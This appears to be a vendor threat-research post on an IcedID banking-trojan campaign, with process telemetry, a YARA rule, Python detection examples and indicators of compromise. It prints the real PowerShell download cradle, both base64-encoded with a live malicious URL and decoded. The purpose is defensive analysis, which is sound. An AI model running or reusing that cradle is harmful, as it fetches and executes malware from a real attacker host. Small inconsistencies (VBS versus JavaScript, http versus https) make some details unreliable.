IcedID, also known as BokBot, is a banking trojan that was first discovered in 2017. It steals a victim's financial information and is also capable of dropping other malware, most commonly Cobalt Strike.
OpenText™ Cybersecurity Services observed a recent malspam campaign where IcedID was delivered via an archived zip file containing a Visual Basic script.
The OpenText Services Team, as part of its threat research activities, continuously monitors how malware behaves on the endpoint and creates alerting content for the OpenText Managed Extended Detection and Response (MxDR) Service and its Managed Security Services customers.
Infection Chain
Upon execution of the malicious JavaScript associated with the IcedID infection, the script calls the command interpreter to run a base64-encoded Windows PowerShell command. That PowerShell command communicates outbound to an IcedID redirect domain and then downloads a malicious DLL file. Next, PowerShell executes the downloaded DLL through the Rundll process. Finally, the DLL launches a Command and Control (C2) client that generates traffic to the IcedID C2 server.
Parent Process: C:\Windows\explorer.exe
Child Process: C:\Windows\System32\wscript.exe
CommandLine: C:\Windows\System32\WScript.exe:C:\Users\Administrator\Downloads\scan_contract.js
Parent Process: C:\Windows\System32\wscript.exe
Child Process: C:\Windows\System32\cmd.exe
CommandLine: "C:\Windows\System32\cmd.exe" /c poWershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkAYwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA
Decoded Base64 Script:
IEX (New-Object Net.Webclient).downloadstring("https://shisyatnic[.]top/gatef1.php")
Parent Process: C:\Windows\System32\cmd.exe
Child Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: poWershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkAYwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA
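The chain above is what an endpoint analyst sees in process telemetry: a script host launching cmd.exe, which launches PowerShell with a hidden window, a bypassed execution policy and an -enc payload. The added Python below (example code, not OpenText's detection content) shows how alerting logic can decode that payload and score each event. The -EncodedCommand switch carries base64 of a UTF-16LE string, which is why a plain base64 decode shows interleaved null bytes. The event records, their field names (parent, image, cmdline) and the benign fourth event are constructed for the example; the encoded blob is the one shown in the command lines above.

```python
import base64
import re

# The -enc blob from the command lines above (UTF-16LE text, base64-encoded).
ENC_BLOB = ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBk"
            "AG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkA"
            "YwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA")

# Process-creation events constructed to mirror the chain shown above. The field names
# are an assumption; real EDR telemetry uses its own schema. The last event is a
# constructed benign case so the logic has a negative example to clear.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"C:\Windows\System32\WScript.exe C:\Users\Administrator\Downloads\scan_contract.js"},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c poWershell -nop -w hidden -ep bypass -enc ' + ENC_BLOB},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "poWershell -nop -w hidden -ep bypass -enc " + ENC_BLOB},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Service"},
]

# PowerShell accepts -e, -ec, -enc and -EncodedCommand. Requiring whitespace right after
# the switch keeps -ep (ExecutionPolicy) from being mistaken for it.
ENC_SWITCH = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload, or None if there is none."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16LE
        return None


def analyze_event(event):
    """Return the list of suspicious traits observed in one process-creation event."""
    findings = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"]
    cmd_l = cmd.lower()

    # A script host executing a .js/.vbs file straight from the Downloads folder.
    if image.endswith(SCRIPT_HOSTS) and re.search(r"\\downloads\\[^ ]+\.(js|vbs|jse|wsf)\b", cmd_l):
        findings.append("script_host_running_downloaded_script")
    # wscript/cscript spawning a command shell or PowerShell.
    if parent.endswith(SCRIPT_HOSTS) and (image.endswith("cmd.exe") or image.endswith("powershell.exe")):
        findings.append("script_host_spawned_shell")
    if "powershell" in cmd_l:
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd_l):
            findings.append("hidden_window")
        if re.search(r"-e(?:xecutionpolicy|p)?\s+bypass", cmd_l):
            findings.append("execution_policy_bypass")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded_command")
            # IEX/Invoke-Expression fed by a web download is the classic download cradle.
            if (re.search(r"\b(iex|invoke-expression)\b", decoded, re.I)
                    and re.search(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", decoded, re.I)):
                findings.append("download_cradle")
    return findings


def triage(events):
    """Return (image, findings) for every event that tripped at least one trait."""
    hits = []
    for e in events:
        findings = analyze_event(e)
        if findings:
            hits.append((e["image"], findings))
    return hits


if __name__ == "__main__":
    for image, findings in triage(SAMPLE_EVENTS):
        print(image, "->", ", ".join(findings))
```

Run on the sample, the three malicious events are reported and the benign PowerShell invocation produces no findings. The decoded payload is the download cradle shown above; alerting on "encoded_command" together with "download_cradle" or "script_host_spawned_shell" is far less noisy than alerting on encoded PowerShell alone, which administrators and management tools also use.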
YARA Rule for IcedID identification:

rule IcedID_Malware {
    meta:
        author = "OpenText"
        description = "Detects IcedID"
    strings:
        $s1 = "POST" fullword wide
        $s2 = "; _ga=" fullword wide
        $s3 = "; _u=" fullword wide
        $s4 = "; __io=" fullword wide
        $s5 = "; _gid=" fullword wide
        $s6 = "Cookie: _s=" fullword wide
    condition:
        all of ($s*)
}
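Every string in the rule carries the "fullword wide" modifiers, and that decides where the rule is useful. "wide" means the string is searched as UTF-16LE (two bytes per character), the form a compiler gives to L"..." literals inside a Windows binary; "fullword" means a hit only counts when the bytes immediately before and after it are not alphanumeric. The added Python below (example code, not OpenText's) reimplements those two semantics and applies the rule's six strings with an "all of" condition to two constructed buffers: a stand-in for a binary's string table with null-terminated wide strings, and an ASCII HTTP request like the one a proxy log or packet capture would show. Neither buffer is taken from the real DLL or real traffic.

```python
import string

ALNUM = set(string.ascii_letters + string.digits)

# The six strings from the YARA rule above, combined with an "all of" condition.
RULE_STRINGS = ["POST", "; _ga=", "; _u=", "; __io=", "; _gid=", "Cookie: _s="]


def is_alnum_unit(unit, width):
    """True if one character unit (1 byte ascii, 2 bytes UTF-16LE) is alphanumeric."""
    if len(unit) != width:          # start or end of buffer: treated as a delimiter
        return False
    if width == 2 and unit[1] != 0:  # non-ASCII code unit: not alphanumeric for our purposes
        return False
    return chr(unit[0]) in ALNUM


def find_fullword(data, s, wide=True):
    """Offsets where s occurs as a 'fullword' match, in wide (UTF-16LE) or ascii form."""
    enc, width = ("utf-16-le", 2) if wide else ("ascii", 1)
    needle = s.encode(enc)
    hits, start = [], 0
    while True:
        i = data.find(needle, start)
        if i < 0:
            return hits
        before = data[max(i - width, 0):i]
        after = data[i + len(needle):i + len(needle) + width]
        if not is_alnum_unit(before, width) and not is_alnum_unit(after, width):
            hits.append(i)
        start = i + 1


def rule_matches(data, wide=True):
    """Equivalent of the rule's condition: every string must have at least one hit."""
    return all(find_fullword(data, s, wide) for s in RULE_STRINGS)


def wide_table(*strings):
    """Lay strings out as null-terminated UTF-16LE, the way a binary stores L"..." literals."""
    return b"".join(s.encode("utf-16-le") + b"\x00\x00" for s in strings)


# Constructed stand-in for an executable's string table (not bytes from the real DLL).
BINARY_LIKE = (b"MZ" + b"\x90" * 16
               + wide_table("POST", "Cookie: _s=", "; _ga=", "; _u=", "; __io=", "; _gid=", "%s?%s")
               + b"\x00" * 8)

# Constructed ASCII HTTP request of the shape a proxy log or packet capture would hold.
TRAFFIC_LIKE = (b"POST /news/ HTTP/1.1\r\nHost: example.invalid\r\n"
                b"Cookie: _s=1; _ga=1.2.3; _u=4; __io=5; _gid=6\r\n\r\n")


if __name__ == "__main__":
    print("binary-like buffer:", rule_matches(BINARY_LIKE))
    print("traffic, wide:     ", rule_matches(TRAFFIC_LIKE))
    print("traffic, ascii:    ", rule_matches(TRAFFIC_LIKE, wide=False))
```

The binary-like buffer matches: each literal is followed by a null terminator, so the fullword check passes. The ASCII request does not match, for two separate reasons worth knowing before deploying the rule. First, the traffic is not UTF-16LE, so "wide" never finds the bytes at all. Second, even if "ascii" were added to the rule, "fullword" rejects "Cookie: _s=" in the request because the cookie value (an alphanumeric character) follows the "=" directly, and likewise "; _ga=" is preceded by the previous value's last character. The rule is therefore a file and memory scanning signature for the DLL, not a network detection; cover the C2 traffic with the domains listed in the Indicators of Compromise instead.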
Indicators of Compromise:
IcedID Redirect Domain: shisyatnic[.]top/gatef1.php
IcedID DLL Hosting Domain: shisyatnic[.]top/dll/loader_p1_dll_64_n1_x64_inf.dll77.dll
IcedID C2: skanfordiporka[.]com
IcedID JavaScript: MD5 Hash – fb1a30af0da989004eaeeac8e72778df
IcedID DLL: MD5 Hash – 658f14c5d83de5e5fee5f5ae00087139
OpenText Cybersecurity Services
Upon detection of malware such as IcedID, OpenText recommends that an incident response engagement be carried out. Our Consulting Team uses its extensive experience to threat hunt and remediate any suspected cyber attack. Customers rely on OpenText for their Digital Forensics and Incident Response as well as our Risk & Compliance Advisory and Managed Security Services. Learn more about our Services.